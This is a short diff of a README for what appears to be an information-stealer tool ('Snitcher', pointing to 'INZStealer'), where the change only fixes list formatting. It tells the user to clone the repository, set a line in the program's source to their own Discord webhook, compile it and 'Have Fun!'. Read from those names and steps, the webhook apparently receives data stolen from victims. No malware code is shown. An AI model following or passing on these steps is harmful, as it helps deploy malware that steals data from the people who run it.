InstinctEx/Snitcher/README.md

 # HOW TO USE

   - Clone the repo
-  -Edit this : https://github.com/InstinctEx/INZStealer/blob/26fbccc0392c0bba2652970df73fce65bb7873c3/INZStealer/Program.cs#L20 to your discord webhook
+  - Edit this : https://github.com/InstinctEx/INZStealer/blob/26fbccc0392c0bba2652970df73fce65bb7873c3/INZStealer/Program.cs#L20 to your discord webhook
-  -Compile your program
+  - Compile it
-  -Have Fun!
+  - Have Fun!